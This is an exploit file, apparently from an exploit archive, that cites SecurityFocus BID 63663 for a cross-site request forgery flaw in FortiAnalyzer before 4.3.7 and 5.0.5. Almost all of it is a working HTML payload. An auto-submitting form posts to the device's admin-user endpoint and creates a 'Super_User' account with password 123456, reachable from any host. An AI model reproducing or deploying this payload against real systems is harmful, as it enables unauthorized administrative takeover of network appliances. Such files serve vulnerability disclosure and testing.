145 lines
No EOL
3.5 KiB
HTML
145 lines
No EOL
3.5 KiB
HTML
source: https://www.securityfocus.com/bid/63663/info
|
|
|
|
FortiAnalyzer is prone to a cross-site request-forgery vulnerability because it fails to properly validate HTTP requests.
|
|
|
|
Exploiting this issue may allow a remote attacker to perform certain unauthorized administrative actions in the context of the device running the affected application. Other attacks are also possible.
|
|
|
|
Versions prior to Fortianalyzer 4.3.7 and 5.0.5 are vulnerable.
|
|
|
|
<html>
|
|
|
|
|
|
|
|
<body onload="CSRF.submit();">
|
|
|
|
|
|
|
|
<html>
|
|
|
|
|
|
|
|
<body onload="CSRF.submit();">
|
|
|
|
|
|
|
|
<form id="csrf"
|
|
action="https://www.example.com/IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog";
|
|
method="post" name="CSRF">
|
|
|
|
<input name="userId" value="user.via.cfsr"> </input>
|
|
|
|
<input name="type" value="0"> </input>
|
|
|
|
<input name="rserver" value=""> </input>
|
|
|
|
<input name="lserver" value=""> </input>
|
|
|
|
<input name="subject" value=""> </input>
|
|
|
|
<input name="cacerts" value="Fortinet_CA2"> </input>
|
|
|
|
<input name="password" value="123456"> </input>
|
|
|
|
<input name="password_updated" value="1"> </input>
|
|
|
|
<input name="confirm_pwd" value="123456"> </input>
|
|
|
|
<input name="confirm_pwd_updated" value="1"> </input>
|
|
|
|
<input name="host_1" value="0.0.0.0/0.0.0.0"> </input>
|
|
|
|
<input name="host_2" value="255.255.255.255/255.255.255.255"> </input>
|
|
|
|
<input name="host_3" value="255.255.255.255/255.255.255.255"> </input>
|
|
|
|
<input name="host_4" value="255.255.255.255/255.255.255.255"> </input>
|
|
|
|
<input name="host_5" value="255.255.255.255/255.255.255.255"> </input>
|
|
|
|
<input name="host_6" value="255.255.255.255/255.255.255.255"> </input>
|
|
|
|
<input name="host_7" value="255.255.255.255/255.255.255.255"> </input>
|
|
|
|
<input name="host_8" value="255.255.255.255/255.255.255.255"> </input>
|
|
|
|
<input name="host_9" value="255.255.255.255/255.255.255.255"> </input>
|
|
|
|
<input name="host_10" value="255.255.255.255/255.255.255.255"> </input>
|
|
|
|
<input name="host6_1"
|
|
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
|
|
|
<input name="host6_2"
|
|
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
|
|
|
<input name="host6_3"
|
|
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
|
|
|
<input name="host6_4"
|
|
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
|
|
|
<input name="host6_5"
|
|
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
|
|
|
<input name="host6_6"
|
|
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
|
|
|
<input name="host6_7"
|
|
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
|
|
|
<input name="host6_8"
|
|
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
|
|
|
<input name="host6_9"
|
|
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
|
|
|
<input name="host6_10"
|
|
value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input>
|
|
|
|
<input name="profile" value="Super_User"> </input>
|
|
|
|
<input name="alladomRDGrp" value="0"> </input>
|
|
|
|
<input name="_adom" value=""> </input>
|
|
|
|
<input name="allpackRDGrp" value="0"> </input>
|
|
|
|
<input name="_adom" value=""> </input>
|
|
|
|
<input name="allpackRDGrp" value="0"> </input>
|
|
|
|
<input name="_pack" value=""> </input>
|
|
|
|
<input name="desc" value=""> </input>
|
|
|
|
<input name="showForce" value="0"> </input>
|
|
|
|
<input name="numhosts" value="0"> </input>
|
|
|
|
<input name="numhosts6" value="3"> </input>
|
|
|
|
<input name="_comp_8" value="OK"> </input>
|
|
|
|
<input name="actionevent" value="new"> </input>
|
|
|
|
<input name="profileId" value=""> </input>
|
|
|
|
<input name="mgt" value=""> </input>
|
|
|
|
<input name="dashboard" value=""> </input>
|
|
|
|
<input name="dashboardmodal" value=""> </input>
|
|
|
|
<input name="csrf_token" value=""> </input>
|
|
|
|
|
|
|
|
|
|
|
|
</form>
|
|
|
|
</body>
|
|
|
|
|
|
|
|
</html> |